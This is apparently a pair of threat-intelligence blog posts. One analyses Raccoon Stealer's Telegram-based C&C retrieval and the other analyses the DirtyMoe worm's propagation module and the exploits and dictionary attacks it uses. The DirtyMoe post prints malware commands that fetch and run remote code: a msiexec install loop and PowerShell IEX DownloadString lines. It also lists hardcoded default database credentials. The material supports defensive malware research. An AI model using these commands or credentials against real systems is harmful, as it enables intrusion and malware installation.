447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b unpacked to:

  1. First of all, MAIN_KEY is decrypted. See the decryption code in the image below:

In this example, the MAIN_KEY is jY1aN3zZ2j. This key is used to decrypt Telegram Gates URLs and BotID.

  1. This example decodes and decrypts Telegram Gate URLs. It is stored in the sample as: Rf66cjXWSDBo1vlrnxFnlmWs5Hi29V1kU8o8g8VtcKby7dXlgh1EIweq4Q9e3PZJl3bZKVJok2GgpA90j35LVd34QAiXtpeV2UZQS5VrcO7UWo0E1JOzwI0Zqrdk9jzEGQIEzdvSl5HWSzlFRuIjBmOLmgH/V84PCRFevc40ZuTAZUq+q1JywL+G/1xzXQdYZiKWea8ODgaN+4B8cT3AqbHmY5+6MHEBWTqTsITPAxKdPMu3dC9nwdBF3nlvmX4/q/gSPflYF7aIU1wFhZxViWq2
    After decoding Base64 it has this form:

Decrypting this binary data with RC4 using MAIN_KEY gives us a string with Telegram Gates:

  1. The stealer has to get it’s real C&C. To do so, it requests a Telegram Gate, which returns an HTML-page:

Here you can see a Telegram channel name and its status in Base64: e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32
The prefix (always five characters) and postfix (always six characters) are removed and it becomes mD/ry6GYdwNuXl10SYoVBR7/tFgp The Base64 is then decoded to obtain an encrypted C&C URL:

The TELEGRAM_KEY in this sample is a string 739b4887457d3ffa7b811ce0d03315ce and the Raccoon uses it as a key to RC4 algorithm to finally decrypt the C&C URL: http://91.219.236[.]18/

  1. Raccoon makes a query string with PC information (machine GUID and user name), and BotID
  2. Query string is encrypted with RC4 using a MAIN_KEY and then encoded with Base64.
  3. This data is sent using POST to the C&C, and the response is encoded with Base64 and encrypted with the MAIN_KEY. Actually, it’s a JSON with a lot of parameters and it looks like this:

Thus, the Telegram infrastructure is used to store and update actual C&C addresses. It looks quite convenient and reliable until Telegram decides to take action. 


The people behind Raccoon Stealer

Based on our analysis of seller messages on underground forums, we can deduce some information about the people behind the malware. Raccoon Stealer was developed by a team, some (or maybe all) members of the team are Russian native speakers. Messages on the forum are written in Russian, and we assume they are from former USSR countries because they try to prevent the Stealer from targeting users in these countries.

Possible names/nicknames of group members may be supposed based on the analysis of artifacts, found in samples:

  • C:\Users\a13xuiop1337\
  • C:\Users\David\ 


Raccoon Stealer is quite prevalent: from March 3, 2021 - February 17, 2022 our systems detected more than 25,000 Raccoon-related samples. We identified more than 1,300 distinct configs during that period.

Here is a map, showing the number of systems Avast protected from Raccoon Stealer from March 3, 2021 - February 17, 2022. In this time frame, Avast protected nearly 600,000 Raccoon Stealer attacks.

The country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don’t want to infect computers in Russia or Central Asia. We believe the attacks spray and pray, distributing the malware around the world. It’s not until it makes it onto a system that it begins checking for the default locale. If it is one of the language listed above, it won’t run. This explains why we detected so many attack attempts in Russia, we block the malware before it can run, ie. before it can even get to the stage where it checks for the device’s locale. If an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would stiIl become infected. 

Screenshot with claims about not working with CIS

Telegram Channels

From the more than 1,300 distinct configs we extracted, 429 of them are unique Telegram channels. Some of them were used only in a single config, others were used dozens of times. The most used channels were:

  • jdiamond13 – 122 times
  • jjbadb0y – 44 times
  • nixsmasterbaks2 – 31 times
  • hellobyegain – 25 times
  • h_smurf1kman_1  – 24 times

Thus, five of the most used channels were found in about 19% of configs.

Malware distributed by Raccoon

As was previously mentioned, Raccoon Stealer is able to download and execute arbitrary files from a command from C&C. We managed to collect some of these files. We collected 185 files, with a total size 265 Mb, and some of the groups are:

  • Downloaders – used to download and execute other files
  • Clipboard crypto stealers – change crypto wallet addresses in the clipboard – very popular (more than 10%)
  • WhiteBlackCrypt Ransomware

Servers used to download this software

We extracted unique links to other malware from Raccoon configs received from C&Cs, it was 196 unique URLs. Some analysis results:

  • 43% of URLs have HTTP scheme, 57%HTTPS.
  • 83 domain names were used.
  • About 20% of malware were placed on Discord CDN
  • About 10% were served from aun3xk17k[.]space


We will continue to monitor Raccoon Stealer’s activity, keeping an eye on new C&Cs, Telegram channels, and downloaded samples. We predict it may be used wider by other cybercrime groups. We assume the group behind Raccoon Stealer will further develop new features, including new software to steal data from, for example, as well as bypass protection this software has in place.



The post Raccoon Stealer: “Trash panda” abuses Telegram appeared first on Avast Threat Labs.

DirtyMoe: Worming Modules

16 March 2022 at 12:36

The DirtyMoe malware is deployed using various kits like PurpleFox or injected installers of Telegram Messenger that require user interaction. Complementary to this deployment, one of the DirtyMoe modules expands the malware using worm-like techniques that require no user interaction.

This research analyzes this worming module’s kill chain and the procedures used to launch/control the module through the DirtyMoe service. Other areas investigated include evaluating the risk of identified exploits used by the worm and detailed analysis of how its victim selection algorithm works. Finally, we examine this performance and provide a thorough examination of the entire worming workflow.

The analysis showed that the worming module targets older well-known vulnerabilities, e.g., EternalBlue and Hot Potato Windows Privilege Escalation. Another important discovery is a dictionary attack using Service Control Manager Remote Protocol (SCMR), WMI, and MS SQL services. Finally, an equally critical outcome is discovering the algorithm that generates victim target IP addresses based on the worming module’s geographical location.

One worm module can generate and attack hundreds of thousands of private and public IP addresses per day; many victims are at risk since many machines still use unpatched systems or weak passwords. Furthermore, the DirtyMoe malware uses a modular design; consequently, we expect other worming modules to be added to target prevalent vulnerabilities.

1. Introduction

DirtyMoe, the successful malware we documented in detail in the previous series, also implements mechanisms to reproduce itself. The most common way of deploying the DirtyMoe malware is via phishing campaigns or malvertising. In this series, we will focus on techniques that help DirtyMoe to spread in the wild.

The PurpleFox exploit kit (EK) is the most frequently observed approach to deploy DirtyMoe; the immediate focus of PurpleFox EK is to exploit a victim machine and install DirtyMoe. PurpleFox EK primarily abuses vulnerabilities in the Internet Explorer browser via phishing emails or popunder ads. For example, Guardicore described a worm spread by PurpleFox that abuses SMB services with weak passwords [2], infiltrating poorly secured systems. Recently, Minerva Labs has described the new infection vector installing DirtyMoe via an injected Telegram Installer [1].

Currently, we are monitoring three approaches used to spread DirtyMoe in the wild; Figure 1 illustrates the relationship between the individual concepts. The primary function of the DirtyMoe malware is crypto-mining; it is deployed to victims’ machines using different techniques. We have observed PurpleFox EK, PurleFox Worm, and injected Telegram Installers as mediums to spread and install DirtyMoe; we consider it highly likely that other mechanisms are used in the wild.

Figure 1. Mediums of DirtyMoe

In the fourth series on this malware family, we described the deployment of the DirtyMoe service. Figure 2 illustrates the DirtyMoe hierarchy. The DirtyMoe service is run as a svchost process that starts two other processes: DirtyMoe Core and Executioner, which manages DirtyMoe modules. Typically, the executioner loads two modules; one for Monero mining and the other for worming replication.

Figure 2. DirtyMoe hierarchy

Our research has been focused on worming since it seems that worming is one of the main mediums to spread the DirtyMoe malware. The PurpleFox worm described by Guardicore [2] is just the tip of the worming iceberg because DirtyMoe utilizes sophisticated algorithms and methods to spread itself into the wild and even to spread laterally in the local network.

The goal of the DirtyMoe worm is to exploit a target system and install itself into a victim machine. The DirtyMoe worm abuses several known vulnerabilities as follow:

  • CVE:2019-9082: ThinkPHP – Multiple PHP Injection RCEs
  • CVE:2019-2725: Oracle Weblogic Server – ‘AsyncResponseService’ Deserialization RCE
  • CVE:2019-1458: WizardOpium Local Privilege Escalation
  • CVE:2018-0147: Deserialization Vulnerability
  • CVE:2017-0144: EternalBlue SMB Remote Code Execution (MS17-010)
  • MS15-076: RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
  • Dictionary attacks to MS SQL Servers, SMB, and Windows Management Instrumentation (WMI)

The prevalence of DirtyMoe is increasing in all corners of the world; this may be due to the DirtyMoe worm’s strategy of generating targets using a pseudo-random IP generator that considers the worm’s geological and local location. A consequence of this technique is that the worm is more flexible and effective given its location. In addition, DirtyMoe can be expanded to machines hidden behind NAT as this strategy also provides lateral movement in local networks. A single DirtyMoe instance can generate and attack up to 6,000 IP addresses per second.

The insidiousness of the whole worm’s design is its modularization controlled by C&C servers. For example, DirtyMoe has a few worming modules targeting a specific vulnerability, and C&C determines which worming module will be applied based on information sent by a DirtyMoe instance.

The DirtyMoe worming module implements three basic phases common to all types of vulnerabilities. First, the module generates a list of IP addresses to target in the initial phase. Then, the second phase attacks specific vulnerabilities against these targets. Finally, the module performs dictionary attacks against live machines represented by the randomly generated IP addresses. The most common modules that we have observed are SMB and SQL.

This article focuses on the DirtyMoe worming module. We analyze and discuss the worming strategy, which exploits are abused by the malware author, and a module behavior according to geological locations. One of the main topics is the performance of IP address generation, which is crucial for the malware’s success. We are also looking for specific implementations of abused exploits, including their origins.

2. Worm Kill Chain

We can describe the general workflow of the DirtyMoe worming module through the kill chain. Figure 3 illustrates stages of the worming workflow.

Figure 3. Worming module workflow

The worming module generates targets at random but also considers the geolocation of the module. Each generated target is tested for the presence of vulnerable service versions; the module connects to the specific port where attackers expect vulnerable services and verifies whether the victim’s machine is live. If the verification is successful, the worming module collects basic information about the victim’s OS and versions of targeted services.

The C&C server appears to determine which specific module is used for worming without using any victim’s information. Currently, we do not precisely know what algorithm is used for module choice but suspect it depends on additional information sent to the C&C server.

When the module verifies that a targeted victim’s machine is potentially exploitable, an appropriate payload is prepared, and an attack is started. The payload must be modified for each attack since a remote code execution (RCE) command is valid only for a few minutes.

In this kill chain phase, the worming module sends the prepared payload. The payload delivery is typically performed using protocols of targeted services, e.g., SMB or MS SQL protocols.

Exploitation and Installation
If the payload is correct and the victim’s machine is successfully exploited, the RCE command included in the payload is run. Consequently, the DirtyMoe malware is deployed, as was detailed in the previous article (DirtyMoe: Deployment).

3. RCE Command

The main goal of the worming module is to achieve RCE under administrator privileges and install a new DirtyMoe instance. The general form of the executed command (@[email protected]) is the same for each worming module:
Cmd /c for /d %i in (@[email protected]) do Msiexec /i http://%i/@[email protected] /Q

The command usually iterates through three IP addresses of C&C servers, including ports. IPs are represented by the placeholder @[email protected] filled on runtime. Practically, @[email protected] is regenerated for each payload sent since the IPs are rotated every minute utilizing sophisticated algorithms; this was described in Section 2 of the first blog.

The second placeholder is @[email protected] representing the DirtyMoe object’s name; this is, in fact, an MSI installer package. The package filename is in the form of a hash – [A-F0-9]{8}\.moe. The hash name is generated using a hardcoded hash table, methods for rotations and substrings, and by the MS_RPC_<n> string, where n is a number determined by the DirtyMoe service.

The core of the @[email protected] command is the execution of the remote DirtyMoe object (http://) via msiexec in silent mode (/Q). An example of a specific @[email protected] command is:
Cmd /c for /d %i in ( do Msiexec /i http://%i/ /Q

4. IP Address Generation

The key feature of the worming module is the generation of IP addresses (IPs) to attack. There are six methods used to generate IPs with the help of a pseudo-random generator; each method focuses on a different IPv4 Class. Accordingly, this factor contributes to the globally uniform distribution of attacked machines and enables the generation of more usable IP addresses to target.

4.1 Class B from IP Table

The most significant proportion of generated addresses is provided by 10 threads generating IPs using a hardcoded list of 24,622 items. Each list item is in form 0xXXXX0000, representing IPs of Class B. Each thread generates IPs based on the algorithms as follows:

The algorithm randomly selects a Class B address from the list and 65,536 times generates an entirely random number that adds to the selected Class B addresses. The effect is that the final IP address generated is based on the geological location hardcoded in the list.

Figure 4 shows the geological distribution of hardcoded addresses. The continent distribution is separated into four parts: Asia, North America, Europe, and others (South America, Africa, Oceania). We verified this approach and generated 1M addresses using the algorithm. The result has a similar continental distribution. Hence, the implementation ensures that the IP addresses distribution is uniform.

Figure 4. Geological distribution of hardcoded class B IPs
4.2 Fully Random IP

The other three threads generate completely random IPs, so the geological position is also entirely random. However, the full random IP algorithm generates low classes more frequently, as shown in the algorithm below.

4.3 Derived Classes A, B, C

Three other algorithms generate IPs based on an IP address of a machine (IPm) where the worming module runs. Consequently, the worming module targets machines in the nearby surroundings.

Addresses are derived from the IPm masked to the appropriate Class A/B/C, and a random number representing the lower Class is added; as shown in the following pseudo-code.

4.4 Derived Local IPs

The last IP generating method is represented by one thread that scans interfaces attached to local networks. The worming module lists local IPs using gethostbyname() and processes one local address every two hours.

Each local IP is masked to Class C, and 255 new local addresses are generated based on the masked address. As a result, the worming module attacks all local machines close to the infected machine in the local network.

5. Attacks to Abused Vulnerabilities

We have detected two worming modules which primarily attack SMB services and MS SQL databases. Our team has been lucky since we also discovered something rare: a worming module containing exploits targeting PHP, Java Deserialization, and Oracle Weblogic Server that was still under development. In addition, the worming modules include a packed dictionary of 100,000-words used with dictionary attacks.

5.1 EternalBlue

One of the main vulnerabilities is CVE:2017-0144: EternalBlue SMB Remote Code Execution (patched by Microsoft in MS17-010). It is still bewildering how many EternalBlue attacks are still observed – Avast is still blocking approximately 20 million attempts for the EternalBlue attack every month.

The worming module focuses on the Windows version from Windows XP to Windows 8. We have identified that the EternalBlue implementation is the same as described in exploit-db [3], and an effective payload including the @[email protected] command is identical to DoublePulsar [4]. Interestingly, the whole EternalBlue payload is hardcoded for each Windows architecture, although the payload can be composed for each platform separately.

5.2 Service Control Manager Remote Protocol

No known vulnerability is used in the case of Service Control Manager Remote Protocol (SCMR) [5]. The worming module attacks SCMR through a dictionary attack. The first phase is to guess an administrator password. The details of the dictionary attack are described in Section 6.4.

If the dictionary attack is successful and the module guesses the password, a new Windows service is created and started remotely via RPC over the SMB service. Figure 5 illustrates the network communication of the attack. Binding to the SCMR is identified using UUID {367ABB81-9844-35F1-AD32- 98F038001003}. On the server-side, the worming module as a client writes commands to the \PIPE\svcctl pipe. The first batch of commands creates a new service and registers a command with the malicious @[email protected] payload. The new service is started and is then deleted to attempt to cover its tracks.

The Microsoft HTML Application Host (mshta.exe) is used as a LOLbin to execute and create ShellWindows and run @[email protected]. The advantage of this proxy execution is that mshta.exe is typically marked as trusted; some defenders may not detect this misuse of mshta.exe.

Figure 5. SCMR network communications

Windows Event records these suspicious events in the System log, as shown in Figure 6. The service name is in the form AC<number>, and the number is incremented for each successful attack. It is also worth noting that ImagePath contains the @[email protected] command sent to SCMR in BinaryPathName, see Figure 5.

Figure 6. Event log for SCMR
5.3 Windows Management Instrumentation

The second method that does not misuse any known vulnerability is a dictionary attack to Windows Management Instrumentation (WMI). The workflow is similar to the SCMR attack. Firstly, the worming module must also guess the password of a victim administrator account. The details of the dictionary attack are described in Section 6.4.

The attackers can use WMI to manage and access data and resources on remote computers [6]. If they have an account with administrator privileges, full access to all system resources is available remotely.

The malicious misuse lies in the creation of a new process that runs @[email protected] via a WMI script; see Figure 7. DirtyMoe is then installed in the following six steps:

  1. Initialize the COM library.
  2. Connect to the default namespace root/cimv2 containing the WMI classes for management.
  3. The Win32_Process class is created, and @[email protected] is set up as a command-line argument.
  4. Win32_ProcessStartup represents the startup configuration of the new process. The worming module sets a process window to a hidden state, so the execution is complete silently.
  5. The new process is started, and the DirtyMoe installer is run.
  6. Finally, the WMI script is finished, and the COM library is cleaned up.
Figure 7. WMI scripts creating Win32_Process lunching the @[email protected] command
5.4 Microsoft SQL Server

Attacks on Microsoft SQL Servers are the second most widespread attack in terms of worming modules. Targeted MS SQL Servers are 2000, 2005, 2008, 2012, 2014, 2016, 2017, 2019.

The worming module also does not abuse any vulnerability related to MS SQL. However, it uses a combination of the dictionary attack and MS15-076: “RCE Allow Elevation of Privilege” known as “Hot Potato Windows Privilege Escalation”. Additionally, the malware authors utilize the MS15-076 implementation known as Tater, the PowerSploit function Invoke-ReflectivePEInjection, and CVE-2019-1458: “WizardOpium Local Privilege Escalation” exploit.

The first stage of the MS SQL attack is to guess the password of an attacked MS SQL server. The first batch of username/password pairs is hardcoded. The malware authors have collected the hardcoded credentials from publicly available sources. It contains fifteen default passwords for a few databases and systems like Nette Database, Oracle, Firebird, Kingdee KIS, etc. The complete hardcoded credentials are as follows: 401hk/[email protected]_, admin/admin, bizbox/bizbox, bwsa/bw99588399, hbv7/[email protected], kisadmin/ypbwkfyjhyhgzj, neterp/neterp, ps/740316, root/root, sp/sp, su/[email protected]_, sysdba/masterkey, uep/U_tywg_2008, unierp/unierp, vice/vice.

If the first batch is not successful, the worming module attacks using the hardcoded dictionary. The detailed workflow of the dictionary attack is described in Section 6.4.

If the module successfully guesses the username/password of the attacked MS SQL server, the module executes corresponding payloads based on the Transact-SQL procedures. There are five methods launched one after another.

  1. sp_start_job
    The module creates, schedules, and immediately runs a task with Payload 1.
  2. sp_makewebtask
    The module creates a task that produces an HTML document containing Payload 2.
  3. sp_OAMethod
    The module creates an OLE object using the VBScript “WScript.Shell“ and runs Payload 3.
  4. xp_cmdshell
    This method spawns a Windows command shell and passes in a string for execution represented by Payload 3.
  5. Run-time Environment
    Payload 4 is executed as a .NET assembly.

In brief, there are four payloads used for the DirtyMoe installation. The SQL worming module defines a placeholder @[email protected] representing a full URL to the MSI installation package located in the C&C server. If any of the payloads successfully performed a privilege escalation, the DirtyMoe installation is silently launched via MSI installer; see our DirtyMoe Deployment blog post for more details.

Payload 1

The first payload tries to run the following PowerShell command:
powershell -nop -exec bypass -c "IEX $decoded; MsiMake @[email protected];"
where $decoded contains the MsiMake functions, as is illustrated in Figure 8. The function calls MsiInstallProduct function from msi.dll as a completely silent installation (INSTALLUILEVEL_NONE) but only if the MS SQL server runs under administrator privileges.

Figure 8. MsiMake function
Payload 2

The second payload is used only for sp_makewebtask execution; the payload is written to the following autostart folders:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.hta
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1.hta

Figure 9 illustrates the content of the 1.hta file camouflaged as an HTML file. It is evident that DirtyMoe may be installed on each Windows startup.

Figure 9. ActiveX object runs via sp_makewebtask
Payload 3

The last payload is more sophisticated since it targets the vulnerabilities and exploits mentioned above. Firstly, the worming module prepares a @[email protected] placeholder containing a full URL to the DirtyMoe object that is the adapted version of the Tater PowerShell script.

The first stage of the payload is a powershell command:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''@[email protected]''); MsiMake @[email protected]"

The adapted Tater script implements the extended MsiMake function. The script attempts to install DirtyMoe using three different ways:

  1. Install DirtyMoe via the MsiMake implementation captured in Figure 8.
  2. Attempt to exploit the system using Invoke-ReflectivePEInjection with the following arguments:
    Invoke-ReflectivePEInjection -PEBytes $Bytes -ExeArgs [email protected]@ -ForceASLR
    where $Bytes is the implementation of CVE-2019-1458 that is included in the script.
  3. The last way is installation via the Tater command:
    Invoke-Tater -Command [email protected]@

The example of Payload 3 is:
powershell -nop -exec bypass -c "IEX (New-ObjectNet. WebClient).DownloadString(
''); MsiMake

Payload 4

The attackers use .NET to provide a run-time environment that executes an arbitrary command under the MS SQL environment. The worming module defines a new assembly .NET procedure using Common Language Runtime (CLR), as Figure 10 demonstrates.

Figure 10. Payload 4 is defined as .Net Assembly

The .NET code of Payload 4 is a simple class defining a SQL procedure ExecCommand that runs a malicious command using the Process class; shown in Figure 11.

Figure 11. .Net code executing malicious commands
5.5 Development Module

We have discovered one worming module containing artifacts that indicate that the module is in development. This module does not appear to be widespread in the wild, and it may give insight into the malware authors’ future intentions. The module contains many hard-coded sections in different states of development; some sections do not hint at the @[email protected] execution.


CVE:2019-9082: ThinkPHP - Multiple PHP Injection RCEs.

The module uses the exact implementation published at [7]; see Figure 12. In short, a CGI script that verifies the ability of call_user_func_array is sent. If the verification is passed, the CGI script is re-sent with @[email protected].

Figure 12. CVE:2019-9082: ThinkPHP

CVE:2018-0147: Deserialization Vulnerability

The current module implementation executes a malicious Java class [8], shown in Figure 13, on an attacked server. The RunCheckConfig class is an executioner for accepted connections that include a malicious serializable object.

Figure 13. Java class RunCheckConfig executing arbitrary commands

The module prepares the serializable object illustrated in Figure 14 that the RunCheckConfig class runs when the server accepts this object through the HTTP POST method.

Figure 14. Deserialized object including @[email protected]

The implementation that delivers the RunCheckConfig class into the attacked server abused the same vulnerability. It prepares a serializable object executing ObjectOutputStream, which writes the RunCheckConfig class into c:/windows/tmp. However, this implementation is not included in this module, so we assume that this module is still in development.

Oracle Weblogic Server

CVE:2019-2725: Oracle Weblogic Server - 'AsyncResponseService' Deserialization RCE

The module again exploits vulnerabilities published at [9] to send malicious SOAP payloads without any authentication to the Oracle Weblogic Server T3 interface, followed by sending additional SOAP payloads to the WLS AsyncResponseService interface.

The SOAP request defines the WorkContext as java.lang.Runtime with three arguments. The first argument defines which executable should be run. The following arguments determine parameters for the executable. An example of the WorkContext is shown in Figure 15.

Figure 15. SOAP request for Oracle Weblogic Server

Hardcoded SOAP commands are not related to @[email protected]; we assume that this implementation is also in development.

6. Worming Module Execution

The worming module is managed by the DirtyMoe service, which controls its configuration, initialization, and worming execution. This section describes the lifecycle of the worming module.

6.1 Configuration

The DirtyMoe service contacts one of the C&C servers and downloads an appropriate worming module into a Shim Database (SDB) file located at %windir%\apppatch\TK<volume-id>MS.sdb. The worming module is then decrypted and injected into a new svchost.exe process, as Figure 2 illustrates.

The encrypted module is a PE executable that contains additional placeholders. The DirtyMoe service passes configuration parameters to the module via these placeholders. This approach is identical to other DirtyMoe modules; however, some of the placeholders are not used in the case of the worming module.

The placeholders overview is as follows:

6.2 Initialization

When the worming module, represented by the new process, is injected and resumed by the DirtyMoe service, the module initialization is invoked. Firstly, the module unpacks a word dictionary containing passwords for a dictionary attack. The dictionary consists of 100,000 commonly used passwords compressed using LZMA. Secondly, internal structures are established as follows:

IP Address Backlog
The module stores discovered IP addresses with open ports of interest. It saves the IP address and the timestamp of the last port check.

Dayspan and Hourspan Lists
These lists manage IP addresses and their insertion timestamps used for the dictionary attack. The IP addresses are picked up based on a threshold value defined in the configuration. The IP will be processed if the IP address timestamp surpasses the threshold value of the day or hour span. If, for example, the threshold is set to 1, then if a day/hour span of the current date and a timestamp is greater than 1, a corresponding IP will be processed. The Dayspan list registers IPs generated by Class B from IP Table, Fully Random IP, and Derived Classes A methods; in other words, IPs that are further away from the worming module location. On the other hand, the Hourspan list records IPs located closer.

Thirdly, the module reads its configuration described by the @[email protected] placeholder. The configuration matches this pattern: <IP>|<PNG_ID>|<timeout>|[SMB:HX:PX1.X2.X3:AX:RX:BX:CX:DX:NX:SMB]

  • IP is the number representing the machine IP from which the attack will be carried out. The IP is input for the methods generating IPs; see Section 4. If the IP is not available, the default address is used.
  • PNG_ID is the number used to derive the hash-name that mirrors the DirtyMoe object name (MSI installer package) stored at C&C. The hashname is generated using MS_RPC_<n> string where n is PNG_ID; see Section 3.
  • Timeout is the default timeout for connections to the attacked services in seconds.
  • HX is a threshold for comparing IP timestamps stored in the Dayspan and Hourspan lists. The comparison ascertains whether an IP address will be processed if the timestamp of the IP address exceeds the day/hour threshold.
  • P is the flag for the dictionary attack.
    • X1 number determines how many initial passwords will be used from the password dictionary to increase the probability of success – the dictionary contains the most used passwords at the beginning.
    • X2 number is used for the second stage of the dictionary attack if the first X1 passwords are unsuccessful. Then the worming module tries to select X2 passwords from the dictionary randomly.
    • X3 number defines how many threads will process the Dayspan and Hourspan lists; more precisely, how many threads will attack the registered IP addresses in the Dayspan/Hourspan lists.
  • AX: how many threads will generate IP addresses using Class B from IP Table methods.
  • RX: how many threads for the Fully Random IP method.
  • BX, CX, DX: how many threads for the Derived Classes A, B, C methods.
  • NX defines a thread quantity for the Derived Local IPs method.

The typical configuration can be|5|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]

Finally, the worming module starts all threads defined by the configuration, and the worming process and attacks are started.

6.3 Worming

The worming process has five phases run, more or less, in parallel. Figure 16 has an animation of the worming process.

Figure 16. Worming module workflow
Phase 1

The worming module usually starts 23 threads generating IP addresses based on Section 4. The IP addresses are classified into two groups: day-span and hour-span.

Phase 2

The second phase runs in parallel with the first; its goal is to test generated IPs. Each specific module targets defined ports ​that are verified via sending a zero-length transport datagram. If the port is active and ready to receive data, the IP address of the active port is added to IP Address Backlog. Additionally, the SMB worming module immediately tries the EternalBlue attack within the port scan.

Phase 3

The IP addresses verified in Phase 2 are also registered into the Dayspan and Hourspan lists. The module keeps only 100 items (IP addresses), and the lists are implemented as a queue. Therefore, some IPs can be removed from these lists if the IP address generation is too fast or the dictionary attacks are too slow. However, the removed addresses are still present in the IP Address Backlog.

Phase 4

The threads created based on the X3 configuration parameters process and manage the items (IPs) of Dayspan and Hourspan lists. Each thread picks up an item from the corresponding list, and if the defined day/hour threshold (HX parameter) is exceeded, the module starts the dictionary attack to the picked-up IP address.

Phase 5

Each generated and verified IP is associated with a timestamp of creation. The last phase is activated if the previous timestamp is older than 10 minutes, i.e., if the IP generation is suspended for any reason and no new IPs come in 10 minutes. Then one dedicated thread extracts IPs from the backlog and processes these IPs from the beginning; These IPs are processed as per Phase 2, and the whole worming process continues.

6.4 Dictionary Attack

The dictionary attack targets two administrator user names, namely administrator for SMB services and sa for MS SQL servers. If the attack is successful, the worming module infiltrates a targeted system utilizing an attack series composed of techniques described in Section 5:

  • Service Control Manager Remote Protocol (SCMR)
  • Windows Management Instrumentation (WMI)
  • Microsoft SQL Server (SQL)

The first attack attempt is sent with an empty password. The module then addresses three states based on the attack response as follows:

  • No connection: the connection was not established, although a targeted port is open – a targeted service is not available on this port.
  • Unsuccessful: the targeted service/system is available, but authentication failed due to an incorrect username or password.
  • Success: the targeted service/system uses the empty password.
Administrator account has an empty password 

If the administrator account is not protected, the whole worming process occurs quickly (this is the best possible outcome from the attacker’s point of view). The worming module then proceeds to infiltrate the targeted system with the attack series (SCMR, WMI, SQL) by sending the empty password.

Bad username or authentication information

A more complex situation occurs if the targeted services are active, and it is necessary to attack the system by applying the password dictionary.

Cleverly, the module stores all previously successful passwords in the system registry; the first phase of the dictionary attack iterates through all stored passwords and uses these to attack the targeted system. Then, the attack series (SCMR, WMI, SQL) is started if the password is successfully guessed.

The second phase occurs if the stored registry passwords yield no success. The module then attempts authentication using a defined number of initial passwords from the password dictionary. This number is specified by the X1 configuration parameters (usually X1*100). If this phase is successful, the guessed password is stored in the system registry, and the attack series is initiated.

The final phase follows if the second phase is not successful. The module randomly chooses a password from a dictionary subset X2*100 times. The subset is defined as the original dictionary minus the first X1*100 items. In case of success, the attack series is invoked, and the password is added to the system registry.

Successfully used passwords are stored encrypted, in the following system registry location:

7. Summary and Discussion


We have detected three versions of the DirtyMoe worming module in use. Two versions specifically focus on the SMB service and MS SQL servers. However, the third contains several artifacts implying other attack vectors targeting PHP, Java Deserialization, and Oracle Weblogic Server. We continue to monitor and track these activities.

Attacked Machines

One interesting finding is an attack adaptation based on the geological location of the worming module. Methods described in Section 4 try to distribute the generated IP addresses evenly to cover the largest possible radius. This is achieved using the IP address of the worming module itself since half of the threads generating the victim’s IPs are based on the module IP address. Otherwise, if the IP is not available for some reason, the IP address located in Los Angeles is used as the base address.

We performed a few VPN experiments for the following locations: the United States, Russian Federation, Czech Republic, and Taiwan. The results are animated in Figure 17; Table 1 records the attack distributions for each tested VPN.

VPN Attack Distribution Top countries
United States North America (59%)
Europe (21%)
Asia (16%)
United States
Russian Federation North America (41%)
Europe (33%)
Asia (20%)
United States, Iran, United Kingdom, France, Russian Federation
Czech Republic Europe (56%)
Asia (14%)
South America (11%)
China, Brazil, Egypt, United States, Germany
Taiwan North America (47%)
Europe (22%)
Asia (18%)
United States, United Kingdom, Japan, Brazil, Turkey
Table 1. VPN attack distributions and top countries
Figure 17. VPN attack distributions

Perhaps the most striking discovery was the observed lateral movement in local networks. The module keeps all successfully guessed passwords in the system registry; these saved passwords increase the probability of password guessing in local networks, particularly in home and small business networks. Therefore, if machines in a local network use the same weak passwords that can be easily assessed, the module can quickly infiltrate the local network.


All abused exploits are from publicly available resources. We have identified six main vulnerabilities summarized in Table 2. The worming module adopts the exact implementation of EternalBlue, ThinkPHP, and Oracle Weblogic Server exploits from exploit-db. In the same way, the module applies and modifies implementations of DoublePulsar, Tater, and PowerSploit frameworks.

ID Description
CVE:2019-9082 ThinkPHP – Multiple PHP Injection RCEs
CVE:2019-2725 Oracle Weblogic Server – ‘AsyncResponseService’ Deserialization RCE
CVE:2019-1458 WizardOpium Local Privilege Escalation
CVE:2018-0147 Deserialization Vulnerability
CVE:2017-0144 EternalBlue SMB Remote Code Execution (MS17-010)
MS15-076 RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
Table 2. Used exploits
C&C Servers

The C&C servers determine which module will be deployed on a victim machine. The mechanism of the worming module selection depends on client information additionally sent to the C&C servers. However, details of how this module selection works remain to be discovered.

Password Dictionary

The password dictionary is a collection of the most commonly used passwords obtained from the internet. The dictionary size is 100,000 words and numbers across several topics and languages. There are several language mutations for the top world languages, e.g., English, Spanish, Portuguese, German, French, etc. (passwort, heslo, haslo, lozinka, parool, wachtwoord, jelszo, contrasena, motdepasse). Other topics are cars (volkswagen, fiat, hyundai, bugatti, ford) and art (davinci, vermeer, munch, michelangelo, vangogh). The dictionary also includes dirty words and some curious names of historical personalities like hitler, stalin, lenin, hussein, churchill, putin, etc.

The dictionary is used for SCMR, WMI, and SQL attacks. However, the SQL module hard-codes another 15 pairs of usernames/passwords also collected from the internet. The SQL passwords usually are default passwords of the most well-known systems.

Worming Workflow

The modules also implement a technique for repeated attacks on machines with ‘live’ targeted ports, even when the first attack was unsuccessful. The attacks can be scheduled hourly or daily based on the worm configuration. This approach can prevent a firewall from blocking an attacking machine and reduce the risk of detection.

Another essential attribute is the closing of TCP port 445 port following a successful exploit of a targeted system. This way, compromised machines are “protected” from other malware that abuse the same vulnerabilities. The MSI installer also includes a mechanism to prevent overwriting DirtyMoe by itself so that the configuration and already downloaded modules are preserved.

IP Generation Performance

The primary key to this worm’s success is the performance of the IP generator. We have used empirical measurement to determine the performance of the worming module. This measurement indicates that one module instance can generate and attack 1,500 IPs per second on average. However, one of the tested instances could generate up to 6,000 IPs/sec, so one instance can try two million IPs per day.

The evidence suggests that approximately 1,900 instances can generate the whole IPv4 range in one day; our detections estimate more than 7,000 active instances exist in the wild. In theory, the effect is that DirtyMoe can generate and potentially target the entire IPv4 range three times a day.

8. Conclusion

